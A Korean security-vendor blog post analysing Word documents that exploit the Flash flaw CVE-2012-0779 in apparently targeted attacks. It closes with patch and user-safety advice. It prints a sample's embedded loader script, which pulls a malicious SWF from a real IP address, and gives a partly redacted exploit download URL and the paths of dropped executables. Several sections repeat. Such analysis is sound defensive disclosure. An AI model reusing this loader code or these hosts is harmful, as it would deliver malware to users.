1. 개요
2. CVE-2012-0779 악성파일 발견 사례
CVE-2012-0779 보안 취약점을 이용한 다양한 악성파일이 발견되고 있다. 아래 화면은 최근에 잉카인터넷 대응팀이 발견한 종류이고, 한글로 작성된 문서도 확인된 상태이다. 또한, 국내의 특정 사이트가 해킹되어 악성파일 유포에도 악용된 바 있다.
■ 2012년 04월 30일 월요일 한글 내용으로 유포된 내용 발견
CVE-2012-0779 취약점을 이용했으면서 한글관련 내용으로 유포된 MS Word 형식의 악성파일이다. 파일이 한글로 작성되어 있다는 점과 악성파일 호스트에 사용된 웹 사이트가 한국이라는 점에서 국내 표적형(APT)공격에 사용되었을 것으로도 추정되고 있다.
파일명은 "유통관련자료_수정본.doc" 이며, 실행하면 다음과 같은 화면이 보여진다.
이외에도 상기 한글 내용에서 사용한 국내 웹사이트 주소를 동일하게 사용하는 또 다른 악성파일도 추가 존재하는데, 이것은 영문 내용으로 만들어져 있다.
■ 2012년 05월 03일 목요일 외국 발견
"WUC Invitation Letter Guests.doc" 라는 이름의 MS Word 문서파일로 위장한 CVE-2012-0779 취약점 악성파일이 첨부되어 있고, 문서파일이 실행되면 다음과 같은 화면이 보여진다.
DOC 문서 파일 내부에는 다음과 같은 스크립트 코드를 포함하고 있으며, 이를 통해서 악성 플래시 SWF 파일을 로딩 시도하게 된다. SWF 파일은 현재 정상적으로 연결되고 있지 않다.
eval(document.write(unescape('
%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001af
a0338&infosize=00FC0000%3E%3C/embed%3E')))
악의적인 플래시 파일이 다운로드되고 실행되면 다음과 같은 순서로 최종 악성파일 conime.exe 가 생성되고 실행된다.
3. 마무리
해당 악성파일이 사용하는 보안 취약점(CVE-2012-0779)이 해결된 Adobe Flash Player 11.2.202.235 정식 버전이 배포 중에 있으므로, 지금 즉시 최신 보안 업데이트를 적용하여 관련 취약점을 이용한 보안 위협을 신속하게 패치하도록 한다.
[다운로드]
http://get.adobe.com/kr/flashplayer/
[칼럼]개그콘서트에 없는 네가지? 오해하지마! 보안 업데이트
http://erteam.nprotect.com/250
악성파일에 감염되어 치료를 진행하는 것은 이미 사용자의 입장에서는 어느정도 감염 피해를 입은 후 조치하는 후속 절차 이다. 이와 같이 원치 않는 피해 발생으로 부터 안전하기 위해서는 아래와 같은 "보안 관리 수칙"을 준수하는 등 사용자 스스로의 관심과 노력이 무엇보다 중요하다고 할 수 있다.
2. CVE-2012-0779 악성파일 발견 사례
CVE-2012-0779 보안 취약점을 이용한 다양한 악성파일이 발견되고 있다. 아래 화면은 최근에 잉카인터넷 대응팀이 발견한 종류이고, 한글로 작성된 문서도 확인된 상태이다. 또한, 국내의 특정 사이트가 해킹되어 악성파일 유포에도 악용된 바 있다.
※ 참고자료
- Symantec
Targeted Attacks Using Confusion (CVE-2012-0779)
- SecurityFocus
Adobe Flash Player CVE-2012-0779 Object Type Confusion Remote Code Execution Vulnerability
- Symantec
Targeted Attacks Using Confusion (CVE-2012-0779)
- SecurityFocus
Adobe Flash Player CVE-2012-0779 Object Type Confusion Remote Code Execution Vulnerability
■ 2012년 04월 30일 월요일 한글 내용으로 유포된 내용 발견
CVE-2012-0779 취약점을 이용했으면서 한글관련 내용으로 유포된 MS Word 형식의 악성파일이다. 파일이 한글로 작성되어 있다는 점과 악성파일 호스트에 사용된 웹 사이트가 한국이라는 점에서 국내 표적형(APT)공격에 사용되었을 것으로도 추정되고 있다.
파일명은 "유통관련자료_수정본.doc" 이며, 실행하면 다음과 같은 화면이 보여진다.
악성 MS DOC 문서 내부에는 다음과 같이 내부에 포함된 스크립트 코드에 의해서 국내의 특정 URL 사이트로 연결을 시도한다. 이것으로 보아 국내 웹 사이트를 해킹하여 Exploit 파일인 "exp.swf" 악성파일을 사전에 설치해 둔 것도 확인할 수 있다.
해당 웹 사이트에서는 현재 악성 swf 파일이 제거된 상태이다.
[다운로드]
http://(일부생략)tkorea.com/uploadfiles/upload/exp.swf
이외에도 상기 한글 내용에서 사용한 국내 웹사이트 주소를 동일하게 사용하는 또 다른 악성파일도 추가 존재하는데, 이것은 영문 내용으로 만들어져 있다.
■ 2012년 05월 03일 목요일 외국 발견
"WUC Invitation Letter Guests.doc" 라는 이름의 MS Word 문서파일로 위장한 CVE-2012-0779 취약점 악성파일이 첨부되어 있고, 문서파일이 실행되면 다음과 같은 화면이 보여진다.
DOC 문서 파일 내부에는 다음과 같은 스크립트 코드를 포함하고 있으며, 이를 통해서 악성 플래시 SWF 파일을 로딩 시도하게 된다. SWF 파일은 현재 정상적으로 연결되고 있지 않다.
eval(document.write(unescape('
a0338&infosize=00FC0000%3E%3C/
악의적인 플래시 파일이 다운로드되고 실행되면 다음과 같은 순서로 최종 악성파일 conime.exe 가 생성되고 실행된다.
① C:\Documents and Settings\[사용자계정]\Application Data\Macromedia\Flash Player\#SharedObjects\temp.exe
② C:\Documents and Settings\[사용자계정]\Application Data\Macromedia\Flash Player\#SharedObjects\Flash_ActiveX.exe
③ C:\Documents and Settings\[사용자계정]\Application Data\conime.exe
② C:\Documents and Settings\[사용자계정]\Application Data\Macromedia\Flash Player\#SharedObjects\Flash_ActiveX.exe
③ C:\Documents and Settings\[사용자계정]\Application Data\conime.exe
3. 마무리
해당 악성파일이 사용하는 보안 취약점(CVE-2012-0779)이 해결된 Adobe Flash Player 11.2.202.235 정식 버전이 배포 중에 있으므로, 지금 즉시 최신 보안 업데이트를 적용하여 관련 취약점을 이용한 보안 위협을 신속하게 패치하도록 한다.
[다운로드]
http://get.adobe.com/kr/flashplayer/
[칼럼]개그콘서트에 없는 네가지? 오해하지마! 보안 업데이트
http://erteam.nprotect.com/250
악성파일에 감염되어 치료를 진행하는 것은 이미 사용자의 입장에서는 어느정도 감염 피해를 입은 후 조치하는 후속 절차 이다. 이와 같이 원치 않는 피해 발생으로 부터 안전하기 위해서는 아래와 같은 "보안 관리 수칙"을 준수하는 등 사용자 스스로의 관심과 노력이 무엇보다 중요하다고 할 수 있다.
※ 보안 관리 수칙
1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.
2. 신뢰할 수 있는 보안업체의 백신을 설치 후 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.
3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.
4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의
1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.
2. 신뢰할 수 있는 보안업체의 백신을 설치 후 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.
3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.
4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의
※ 잉카인터넷(시큐리티대응센터/대응팀)에서는 각종 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.
'분석 정보 > 악성코드 분석 정보' 카테고리의 다른 글
| [긴급]조작된 링크드인 인맥과 맞춤형 악성파일 국내 유입 (0) | 2012.05.15 |
|---|---|
| [주의]국가안보전략 내용의 도움말(HLP)파일로 위장된 APT 공격발견 (4) | 2012.05.14 |
| [주의]초상권 침해 내용으로 유혹 중인 악성파일 국내 발견 (0) | 2012.05.08 |
| [주의]거래개선협회 내용으로 위장한 악성 이메일 국내 유입 (0) | 2012.05.03 |
| [주의]유명 물류 배송을 사칭한 용감한 녀석들! (0) | 2012.04.30 |